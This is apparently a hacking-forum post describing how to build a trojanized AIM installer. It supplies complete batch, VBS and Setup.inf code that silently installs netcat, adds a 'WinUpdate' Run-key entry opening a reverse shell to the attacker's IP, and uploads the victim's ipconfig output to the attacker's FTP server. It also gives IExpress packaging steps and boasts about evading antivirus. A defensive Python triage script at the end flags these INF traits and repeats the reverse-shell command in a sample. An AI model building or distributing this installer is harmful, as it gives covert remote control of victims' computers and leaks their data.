Java v2.0
Current Progress on Java Installer Payload v2.0
- Completely Stealthed
- Bound to aim.exe (or any .exe installer you like)
- Reverse shell on port 69
- WORKS EVEN IF VICTIM HAS A ROUTER
- Implements an ipconfig /all > %computername%.txt
- Uploads %computername%.txt to an FTP server (I am going to include the code but with my FTP info taken out)
- Hidden.vbs and nircmd.exe used to never open up a cmd window (Installation and execution of nc.exe is never displayed)
- WILL EXPLAIN SETUP.INF AND INSTALLATION FURTHER DOWN
- And last but hopefully not the least, Anti virus does not pickup any of it. :D:D
Teh Codez
jvabd.bat:
@echo off
:: Executing IPCONFIG and creating .txt
ipconfig /all > c:WindowsSystem32%Computername%.txt
cls
:: Executing Script to send ipaddr to ftp :D
CALL .hidden.vbs script.bat
:: Quitting
GOTO End
:End
hidden.vbs
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
script.bat
MAKE SURE YOU EDIT THE NECESSARY FIELDS
@ECHO OFF
:: Create the temporary script file
> script.ftp ECHO USER YOURUSERNAME
>>script.ftp ECHO PASSWORD
>>script.ftp ECHO binary
>>script.ftp ECHO prompt n
>>script.ftp ECHO put "C:WindowsSystem32%computername%.txt"
>>script.ftp ECHO QUIT
::Connect to the ftp and run the script
FTP -v -s:script.ftp FTPSERVER
:: Overwriting the temp script so this never happened :D
TYPE NUL >script.ftp
DEL script.ftp
EXIT
Setup.inf
MAKE SURE YOU EDIT THE NECESSARY FIELDS
; This INF File will install netcat in the TARGET system32 directory and implement the following command
; "nc.exe -e cmd.exe 0.0.0.0 69";where 0.0.0.0 is YOUR EXTERNAL ip address
; After the installation a registry key will be added on the victims computer to connect to 0.0.0.0 69
; any time you create a listen server on your computer
; Lets Begin:
[Version]
Signature="$Chicago$"
AdvancedINF=2.0
[DefaultInstall]
Copyfiles=install.files
Copyfiles=installer.files
RunPostSetupCommands=RunPostSetupCommandsSection
AddReg=Add.Settings
[DestinationDirs]
; If you are using a different .exe installer switch the directory HERE
install.files=30,/Windows/System32
installer.files=30,/Program Files/AOL Instant Messenger
[install.files]
; These are the pwnage programs that will be installed into system32
jvabd.bat;ipconfig /all txt creator
script.bat;autoconnect to ftp and upload ipconfig txt :D
nc.exe; netcat of course:
nircmd.exe;hides cmd window
hidden.vbs; hides cmd window while executing a batch in a batch
setup.inf;inf file
[installer.files]
; The aim installer that installs into /program files/aol instant messenger;)
; TO ADD DIFFERENT .EXE INSTALLERS REMOVE AIM.EXE AND REPLACE WITH YOUR.EXE
aim.exe
[Add.Settings]
; Adding registry key to make nc run on boot :D
; Input your IP address into 0.0.0.0 and make sure you have port 69 forwarded to receive the reverse shell :D
HKLM,SoftwareMicrosoftWindowsCurrentVersionRun,WinUpdate, 0x00000000, "C:WindowsSystem32nircmd execmd nc.exe -e cmd.exe 0.0.0.0 69"
[RunPostSetupCommandsSection]
; Programs are going to be listed in order of execution, including parameters (nc :D):
; ONCE AGAIN CHANGE 0.0.0.0 TO YOUR EXTERNAL IP
; If you have a different .exe installer replace aim.exe with your.exe once again
nircmd.exe execmd CALL nc.exe -e cmd.exe 0.0.0.0 69
nircmd.exe execmd CALL jvabd.bat
aim.exe
[SourceDiskNames]
1="default",,1
Instructions on creating the installer
Once you have created the jvabd.bat, hidden.vbs, script.bat and setup.inf, it's time to compile these programs into 1 cabinet .exe installer. Create a folder and name it whatever the fuck you want and inside this folder include the following things: nc.exe, nircmd.exe, jvabd.bat, script.bat, setup.inf, hidden.vbs, and the installer of your choice. Don't worry, when you run the compiled version only the installer is shown; everything else gets stealth installed.
Now, when you have these 7 things inside a folder, it's time to compile them into one. *Note* I have not found a method of doing this on Linux or Mac yet, being as they don't use .exe's. Click start - run - iexpress.exe. Choose "create new..." then click on "Extract files then run an installation command". Create a package title (I did AIM 5.9.8), then decide whether or not you want a confirmation message (This will install blah blah, are you sure?). Next skip the license crap and you will see "Package Files". Click add, browse to your folder with the pwnage in it, and add all 7 items (including your.exe installer).
Click next, on the next screen under "Install Program" choose SETUP.INF not YOUR.EXE INSTALLER and leave the post install command. Click next, leave the show window setting at recommended, click next, create a finished message if you like. Click next, name your installer.exe and choose the place you want to save it, also check the "Hide file extracting progress animation from user". Choose no restart, and on the next screen save your project if you want. Click next, create the package, and you now have a legit installer that includes pwnage :D.
**IF YOU USE THIS AND GET FUCKED ITS NOT MY FAULT**
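For defenders triaging a self-extracting installer, the Setup.inf in this post has four traits that are easy to flag once the package is unpacked: a RunPostSetupCommands section, an AddReg entry under the Run key, dual-use tools in a CopyFiles list, and a netcat command line using -e. The Python below is an added example, not part of the original post; the rule labels, function names and sample INF are this example's own, and its `;` comment stripping is naive (it does not handle a `;` inside a quoted string).

```python
import re

DUAL_USE = {"nc.exe", "nircmd.exe"}  # tool names taken from the post
RUN_KEY = re.compile(r"currentversion\\?run(once)?\b")
NC_EXEC = re.compile(r"\bnc(\.exe)?\s.*-e\s")

def parse_inf(text):
    """Return {section: [lines]}, lower-cased, ';' comments stripped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip().lower()
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = sections.setdefault(m.group(1), [])
        elif line and current is not None:
            current.append(line)
    return sections

# (label, predicate over one lower-cased INF line)
RULES = [
    ("post-setup-commands", lambda s: s.startswith("runpostsetupcommands")),
    ("run-key-autostart", lambda s: s.startswith("hk") and RUN_KEY.search(s)),
    ("netcat-exec-shell", lambda s: NC_EXEC.search(s)),
    ("dual-use-tool-copied", lambda s: s.split(",")[0].strip() in DUAL_USE),
]

def triage_inf(text):
    """Return the sorted labels of every rule that matches any line."""
    lines = [s for sec in parse_inf(text).values() for s in sec]
    return sorted({label for label, hit in RULES for s in lines if hit(s)})

# Constructed sample modelled on the Setup.inf above; 192.0.2.10 is a
# documentation address, not a value from the post.
SAMPLE_INF = r"""
[DefaultInstall]
CopyFiles=install.files
RunPostSetupCommands=PostSetup
AddReg=Add.Settings
[install.files]
nc.exe ; dropped tool
nircmd.exe
[Add.Settings]
HKLM,Software\Microsoft\Windows\CurrentVersion\Run,WinUpdate,0,"nircmd execmd nc.exe -e cmd.exe 192.0.2.10 69"
[PostSetup]
nircmd.exe execmd CALL nc.exe -e cmd.exe 192.0.2.10 69
"""

if __name__ == "__main__":
    print(triage_inf(SAMPLE_INF))
```

Any single label is only a lead (legitimate installers use post-setup commands too); the combination of a Run-key write with a `-e` netcat command is what makes this INF stand out.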